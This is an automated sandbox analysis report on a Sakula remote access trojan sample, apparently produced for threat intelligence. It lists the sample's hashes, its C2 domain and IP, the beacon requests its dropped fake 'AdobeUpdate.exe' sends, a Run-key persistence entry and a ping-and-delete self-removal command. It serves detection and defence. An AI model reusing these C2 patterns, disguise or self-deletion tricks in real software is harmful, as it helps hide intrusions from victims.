Overview

overview

10

Static

static

10

7cdb15b4ed...3e.exe

windows7-x64

10

7cdb15b4ed...3e.exe

windows10-2004-x64

10

Analysis

  • max time kernel
    119s
  • max time network
    120s
  • platform
    windows7_x64
  • resource
    win7-20241023-en
  • resource tags

    arch:x64arch:x86image:win7-20241023-enlocale:en-usos:windows7-x64system
  • submitted
    01/02/2025, 12:34 UTC

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    7cdb15b4ed3ac8a3c20a67a12b320e7551a101b7c42054fe77b5521238681d3e.exe

  • Size

    92KB

  • MD5

    af9c2ef84126a4db946fab35fc7d38b1

  • SHA1

    30e07ab93c52099ed5273f45c7ecf26c3d51ed5e

  • SHA256

    7cdb15b4ed3ac8a3c20a67a12b320e7551a101b7c42054fe77b5521238681d3e

  • SHA512

    4988952148675816663191fe9fc9cefbb6539a214bdcafcb865464cfcce80820c5db34a3e4a83ce792d43040913ad6d626c7b90f8c1b6a54a27feede2d82aa2d

  • SSDEEP

    1536:TJbCiJVkgMaT2itTkjoRXnM48dXFajVPYxCEtkz30rtrC:9bfVk29te2jqxCEtg30BO

Score
10/10
sakuladiscoverypersistencerattrojan

Malware Config

Extracted

Family

sakula

C2

www.savmpet.com

Signatures

  • Sakula

    Sakula is a remote access trojan with various capabilities.

    trojanratsakula
  • Sakula family
    sakula
  • Sakula payload 1 IoCs
  • Deletes itself 1 IoCs
  • Executes dropped EXE 1 IoCs
  • Loads dropped DLL 4 IoCs
  • Adds Run key to start application 2 TTPs 1 IoCs
    persistence
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 4 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

    discovery
  • System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs

    Adversaries may check for Internet connectivity on compromised systems.

    discovery
  • Runs ping.exe 1 TTPs 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 15 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\7cdb15b4ed3ac8a3c20a67a12b320e7551a101b7c42054fe77b5521238681d3e.exe
    "C:\Users\Admin\AppData\Local\Temp\7cdb15b4ed3ac8a3c20a67a12b320e7551a101b7c42054fe77b5521238681d3e.exe"
    1⤵
    • Loads dropped DLL
    • Adds Run key to start application
    • System Location Discovery: System Language Discovery
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:588
    • C:\Users\Admin\AppData\Local\Temp\MicroMedia\AdobeUpdate.exe
      C:\Users\Admin\AppData\Local\Temp\MicroMedia\AdobeUpdate.exe
      2⤵
      • Executes dropped EXE
      • Loads dropped DLL
      • System Location Discovery: System Language Discovery
      PID:2348
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 & del /q "C:\Users\Admin\AppData\Local\Temp\7cdb15b4ed3ac8a3c20a67a12b320e7551a101b7c42054fe77b5521238681d3e.exe"
      2⤵
      • Deletes itself
      • System Location Discovery: System Language Discovery
      • System Network Configuration Discovery: Internet Connection Discovery
      • Suspicious use of WriteProcessMemory
      PID:2700
      • C:\Windows\SysWOW64\PING.EXE
        ping 127.0.0.1
        3⤵
        • System Location Discovery: System Language Discovery
        • System Network Configuration Discovery: Internet Connection Discovery
        • Runs ping.exe
        PID:2324

Network

  • flag-us
    DNS
    www.savmpet.com
    AdobeUpdate.exe
    Remote address:
    8.8.8.8:53
    Request
    www.savmpet.com
    IN A
    Response
    www.savmpet.com
    IN A
    52.34.198.229
  • flag-us
    POST
    http://www.savmpet.com/newimage.asp?imageid=cwpfqzec-1909178559&type=0&resid=259444420
    AdobeUpdate.exe
    Remote address:
    52.34.198.229:80
    Request
    POST /newimage.asp?imageid=cwpfqzec-1909178559&type=0&resid=259444420 HTTP/1.1
    User-Agent: iexplorer
    Host: www.savmpet.com
    Content-Length: 176
    Cache-Control: no-cache
    Response
    HTTP/1.1 200 OK
    Server: nginx
    Date: Sat, 01 Feb 2025 12:34:19 GMT
    Content-Type: text/html
    Transfer-Encoding: chunked
    Connection: close
    Set-Cookie: btst=; path=/; domain=.www.savmpet.com; Max-Age=1; Expires=Thu, 01 Jan 1970 00:00:01 GMT; HttpOnly; SameSite=Lax;
    Set-Cookie: btst=; path=/; domain=www.savmpet.com; Max-Age=1; Expires=Thu, 01 Jan 1970 00:00:01 GMT; HttpOnly; SameSite=Lax;
    Set-Cookie: btst=ce7167a7a785479c822349ddfded9303|181.215.176.83|1738413259|1738413259|0|1|0; path=/; domain=.savmpet.com; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
    Set-Cookie: snkz=181.215.176.83; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
  • flag-us
    GET
    http://www.savmpet.com/photo/cwpfqzec-1909178559.jpg?resid=259447805
    AdobeUpdate.exe
    Remote address:
    52.34.198.229:80
    Request
    GET /photo/cwpfqzec-1909178559.jpg?resid=259447805 HTTP/1.1
    User-Agent: iexplorer
    Host: www.savmpet.com
    Cache-Control: no-cache
    Cookie: btst=ce7167a7a785479c822349ddfded9303|181.215.176.83|1738413259|1738413259|0|1|0; snkz=181.215.176.83
    Response
    HTTP/1.1 200 OK
    Server: nginx
    Date: Sat, 01 Feb 2025 12:34:19 GMT
    Content-Type: text/html
    Transfer-Encoding: chunked
    Connection: close
    Set-Cookie: btst=; path=/; domain=.www.savmpet.com; Max-Age=1; Expires=Thu, 01 Jan 1970 00:00:01 GMT; HttpOnly; SameSite=Lax;
    Set-Cookie: btst=; path=/; domain=www.savmpet.com; Max-Age=1; Expires=Thu, 01 Jan 1970 00:00:01 GMT; HttpOnly; SameSite=Lax;
    Set-Cookie: btst=ce7167a7a785479c822349ddfded9303|181.215.176.83|1738413259|1738413259|0|2|0; path=/; domain=.savmpet.com; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
  • 52.34.198.229:80
    http://www.savmpet.com/newimage.asp?imageid=cwpfqzec-1909178559&type=0&resid=259444420
    http
    AdobeUpdate.exe
    580 B
     872 B
     5
    5

    HTTP Request

    POST http://www.savmpet.com/newimage.asp?imageid=cwpfqzec-1909178559&type=0&resid=259444420

    HTTP Response

    200
  • 52.34.198.229:80
    http://www.savmpet.com/photo/cwpfqzec-1909178559.jpg?resid=259447805
    http
    AdobeUpdate.exe
    475 B
     792 B
     5
    5

    HTTP Request

    GET http://www.savmpet.com/photo/cwpfqzec-1909178559.jpg?resid=259447805

    HTTP Response

    200
  • 52.34.198.229:80
    www.savmpet.com
    AdobeUpdate.exe
    152 B
     3
  • 52.34.198.229:80
    www.savmpet.com
    AdobeUpdate.exe
    152 B
     3
  • 52.34.198.229:80
    www.savmpet.com
    AdobeUpdate.exe
    152 B
     3
  • 8.8.8.8:53
    www.savmpet.com
    dns
    AdobeUpdate.exe
    61 B
     77 B
     1
    1

    DNS Request

    www.savmpet.com

    DNS Response

    52.34.198.229

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • \Users\Admin\AppData\Local\Temp\MicroMedia\AdobeUpdate.exe
    Filesize

    92KB

    MD5

    442967e1ca0a0d8408004088db487be4

    SHA1

    63faab4d648ffce4e429fdb5b376d64a72bf5469

    SHA256

    db4de96bcbc462c200b08eab0d3e24a55bc4713e5dd6e99c08639dac3f800894

    SHA512

    acee3765a0db149f63c1876faf928e8a4eef051b8d5426532dda02f0ea24208601eb20f93db98348fd8fbba04acdfa46c9287612e85b28db668f2633131fa983

    Download Submit

We care about your privacy.

This website stores cookies on your computer. These cookies are used to improve your website experience and provide more personalized services to you, both on this website and through other media. To find out more about the cookies we use, see our Privacy Policy.